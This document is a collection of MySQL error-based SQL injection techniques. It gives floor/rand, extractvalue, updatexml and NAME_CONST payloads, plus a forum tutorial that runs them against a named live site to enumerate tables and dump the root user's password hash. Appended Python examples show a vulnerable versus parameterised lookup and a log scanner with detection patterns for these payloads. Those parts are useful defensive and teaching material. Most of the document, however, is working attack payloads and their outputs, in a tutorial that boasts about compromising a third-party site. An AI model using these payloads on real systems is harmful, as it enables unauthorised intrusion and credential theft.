1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers an error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is returned inside the error message. To retrieve other data, replace version() with the subquery you want.

For example, to retrieve the administrator's username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
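All three error channels above depend on the same two application defects: the id value is pasted into the SQL text, and the raw engine error is relayed to the client. The Python below is an added example, not code from the original post; it puts the vulnerable lookup beside a hardened one. It uses an in-memory sqlite3 table standing in for the page's article table, so the injected extractvalue() fails because sqlite lacks that function rather than with the XPATH error MySQL gives, but what it measures, whether engine error text reaches the caller, is the same in both engines. The PAYLOAD string is the section 2 payload as it would arrive in the id parameter.

```python
import re
import sqlite3

# Constructed stand-in for the page's `article` table, using in-memory sqlite3 instead
# of MySQL. sqlite has no extractvalue()/updatexml(), so an injected call fails to
# resolve instead of raising the XPATH error shown on the page; this example only
# measures whether that raw engine error text reaches the caller.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, raw_id):
    """Pastes the request parameter into the SQL text and echoes the engine error
    back: the two defects every error-based technique on this page relies on."""
    sql = "select * from article where id = " + raw_id
    try:
        return {"rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return {"error": str(exc)}  # raw engine message goes straight to the client


_ID_RE = re.compile(r"[0-9]{1,10}")


def lookup_safe(conn, raw_id):
    """Allow-list the parameter shape, bind it as a query parameter, and return only
    a generic message on failure (the real exception belongs in the server log)."""
    if not _ID_RE.fullmatch(raw_id):
        return {"error": "invalid id"}
    try:
        rows = conn.execute("select * from article where id = ?", (int(raw_id),)).fetchall()
        return {"rows": rows}
    except sqlite3.Error:
        return {"error": "lookup failed"}


# The extractvalue() payload from section 2 of the page, as it would arrive in `id`.
PAYLOAD = "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))"

if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, PAYLOAD))  # engine error text leaks to the caller
    print(lookup_safe(db, PAYLOAD))        # {'error': 'invalid id'}
    print(lookup_safe(db, "1"))            # the legitimate row
```

The allow-list regex is the cheap half of the fix; the parameter binding is what removes the injection even for fields that cannot be restricted to digits, and the generic error message is what closes the error-based channel in particular, since with no engine text in the response none of the payloads above have anything to read.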
More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
MySQL error-based injection on newer versions: injecting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
| TEST          |
|---------------|
| 1             |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
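From the defender's side, the four primitives used on this page (the floor(rand(0)*2) GROUP BY collision, extractvalue(), updatexml(), and the doubled NAME_CONST alias from the tutorial above) are easy to recognise in web-server logs, and the engine messages they rely on (Duplicate entry ... for key 'group_key', XPATH syntax error, Duplicate column name) should never appear in a response body. The Python below is an added example, not part of the original post or the tutorial it quotes: it scans access-log lines in combined format for those primitives and flags the error strings. The log lines, client IPs, timestamps and paths are constructed for the example, the technique labels are my own, and the payload shapes are the ones shown on this page.

```python
import re
from urllib.parse import unquote_plus

# Combined-log line: client, identd, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+)')


def classify_query(query):
    """Name the error-based primitives present in one URL-encoded query string."""
    q = unquote_plus(query).lower()
    hits = []
    # floor(rand(0)*2) only collides when it feeds a GROUP BY, so require both parts
    if re.search(r"floor\s*\(\s*rand\s*\(", q) and re.search(r"\bgroup\s+by\b", q):
        hits.append("floor_rand_groupby")
    if re.search(r"\bextractvalue\s*\(", q):
        hits.append("extractvalue")
    if re.search(r"\bupdatexml\s*\(", q):
        hits.append("updatexml")
    # the NAME_CONST trick needs the same constant name twice to force a duplicate column
    if len(re.findall(r"\bname_const\s*\(", q)) >= 2:
        hits.append("name_const_duplicate_column")
    return hits


def scan_access_log(lines):
    """Return one event per request whose query string carries a known primitive."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, _method, target, status, _size = m.groups()
        _path, _, query = target.partition("?")
        hits = classify_query(query)
        if hits:
            events.append({"client": client, "time": ts, "status": int(status), "techniques": hits})
    return events


# Engine messages quoted on this page; their presence in a response body means the
# application is relaying raw MySQL errors to the client.
DB_ERROR_RE = re.compile(r"Duplicate entry '.*' for key 'group_key'|XPATH syntax error|Duplicate column name")


def leaks_db_error(response_body):
    return DB_ERROR_RE.search(response_body) is not None


# Constructed sample lines (documentation-range IPs, made-up paths); the payload shapes
# are the ones shown on this page.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 412',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,version())) HTTP/1.1" 500 380',
    '203.0.113.7 - - [10/Oct/2023:13:55:47 +0000] "GET /article.php?id=1+and+1=(updatexml(1,concat(0x3a,user()),1)) HTTP/1.1" 500 377',
    '203.0.113.7 - - [10/Oct/2023:13:55:50 +0000] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 401',
]

if __name__ == "__main__":
    for event in scan_access_log(SAMPLE_LOG):
        print(event)
```

The query string is URL-decoded before matching because the payloads arrive with + and %xx encoding, and matching on function names plus their structural partner (GROUP BY, a second NAME_CONST) keeps the rules tighter than a bare keyword list. A 500 status on the flagged requests, or leaks_db_error() firing on the response, is the confirmation that the application is actually handing engine errors back, which is the condition that turns these requests from noise into a working read primitive.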